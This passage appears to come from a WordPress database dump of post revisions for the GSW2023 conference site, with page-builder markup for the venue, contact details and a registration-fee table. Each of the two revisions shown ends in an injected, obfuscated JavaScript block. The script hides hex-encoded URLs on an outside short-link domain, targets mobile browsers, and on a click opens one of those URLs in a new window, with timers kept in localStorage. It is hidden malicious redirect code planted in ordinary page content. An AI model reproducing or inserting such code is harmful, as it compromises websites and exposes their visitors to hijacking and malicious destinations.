10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>INTERCONTINENTAL CAIRO SEMIRAMIS</strong></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>MORE INFORMATION</strong></h4>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Office of the Vice President of the Academy for Graduate Studies and Scientific Research</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 21:17:59','2022-11-09 21:17:59','',3066,'https://gsw2023.com/?p=3237',0,'revision','',0),
(3238,1,'2022-11-09 21:21:09','2022-11-09 21:21:09','[vc_row][vc_column][bsf-info-box icon_size=\"32\"]\r\n<h1 style=\"text-align: justify; color: red;\"><strong><span style=\"font-size: 22px;\">THE REGISTRATION FORM WILL Be OPEN Soon IN CONFTOOL</span></strong></h1>\r\n<div class=\"three_quarter first\"><section class=\"clear\">\r\n<h4>The registration fees vary according to the number of days participants want to attend. There are no limitations in the number of parallel workshops that participants can attend in the same day.</h4>\r\n</section></div>\r\n[/bsf-info-box][ultimate_info_table color_scheme=\"blue\" package_heading=\"REGISTRATION FEES\" heading_tag=\"h1\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td rowspan=\"2\"></td>\r\n<td colspan=\"3\"><strong>Standard</strong></td>\r\n<td colspan=\"3\"><strong>Student/Senior</strong></td>\r\n<td colspan=\"3\"><strong>Accompanying person</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Early bird</td>\r\n<td>Late</td>\r\n<td>On Site</td>\r\n<td>Early bird</td>\r\n<td>Late</td>\r\n<td>On Site</td>\r\n<td>Early bird</td>\r\n<td>Late</td>\r\n<td>On Site</td>\r\n</tr>\r\n<tr>\r\n<td>1 Day</td>\r\n<td>$250</td>\r\n<td>$300</td>\r\n<td>$350</td>\r\n<td>$150</td>\r\n<td>$200</td>\r\n<td> $250</td>\r\n<td>$100</td>\r\n<td>$100</td>\r\n<td>$125</td>\r\n</tr>\r\n<tr>\r\n<td>2 Days</td>\r\n<td> $350</td>\r\n<td>$400</td>\r\n<td>$450</td>\r\n<td> $200</td>\r\n<td>$250</td>\r\n<td>$300</td>\r\n<td>$125</td>\r\n<td>$125</td>\r\n<td>$150</td>\r\n</tr>\r\n<tr>\r\n<td>3 Days</td>\r\n<td> $450</td>\r\n<td>$500</td>\r\n<td>$550</td>\r\n<td> $250</td>\r\n<td>$300</td>\r\n<td>$350</td>\r\n<td>$150</td>\r\n<td>$150</td>\r\n<td>$175</td>\r\n</tr>\r\n<tr>\r\n<td>4 Days</td>\r\n<td>$550</td>\r\n<td>$600</td>\r\n<td>$650</td>\r\n<td>$300</td>\r\n<td> $350</td>\r\n<td>$400</td>\r\n<td>$175</td>\r\n<td>$175</td>\r\n<td>$200</td>\r\n</tr>\r\n<tr>\r\n<td>5 Days</td>\r\n<td> $650</td>\r\n<td>$700</td>\r\n<td>$750</td>\r\n<td>$350</td>\r\n<td>$400</td>\r\n<td>$450</td>\r\n<td>$200</td>\r\n<td>$200</td>\r\n<td>$225</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/ultimate_info_table][bsf-info-box icon_size=\"32\"]\r\n<h2>Any Registration Allows A Participant To Present One Paper Accepted For Publication. A Participant Can Only Have One Registration!</h2>\r\n&nbsp;\r\n<h5 style=\"text-align: justify; color: red;\">o Standard and student / senior (over 65) registration fees include:</h5>\r\n<ul class=\"nospace\">\r\n 	<li>\r\n<h6>Entry to all sessions/workshops;</h6>\r\n</li>\r\n 	<li>\r\n<h6>Entry to the Exhibition;</h6>\r\n</li>\r\n 	<li>\r\n<h6>Copy of Final Programme;</h6>\r\n</li>\r\n 	<li>\r\n<h6>Morning and Afternoon Tea/Coffee breaks;</h6>\r\n</li>\r\n 	<li>\r\n<h6>Lunches;</h6>\r\n</li>\r\n 	<li>\r\n<h6>Attendance at Welcome Reception;</h6>\r\n</li>\r\n 	<li>\r\n<h6>Attendance at Exhibitors Reception;</h6>\r\n</li>\r\n</ul>\r\n&nbsp;\r\n<h5 style=\"text-align: justify; color: red;\">o Accompanying person fee includes:</h5>\r\n<ul>\r\n 	<li>\r\n<h6>Entry to Opening Session;</h6>\r\n</li>\r\n 	<li>\r\n<h6>Attendance at Welcome Reception;</h6>\r\n</li>\r\n 	<li>\r\n<h6>Attendance at Exhibitors Reception;</h6>\r\n</li>\r\n 	<li>\r\n<h6>Morning and Afternoon Tea/Coffee breaks;</h6>\r\n</li>\r\n</ul>\r\n&nbsp;\r\n<h5 style=\"text-align: justify; color: red;\">o Cancellation policy:</h5>\r\n<ul>\r\n 	<li>\r\n<h6>Cancellations are accepted by e-mail to the secretariat of GSW2023 The registration fee will be refunded for 80% for cancellations received no later than June 1st, 2023. No refunds after this date, but replacement is allowed.</h6>\r\n</li>\r\n</ul>\r\n<h5 style=\"text-align: justify; color: red;\">-Two Social Dinners Will Be Organized On Tuesday And Thursday.</h5>\r\n[/bsf-info-box][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v 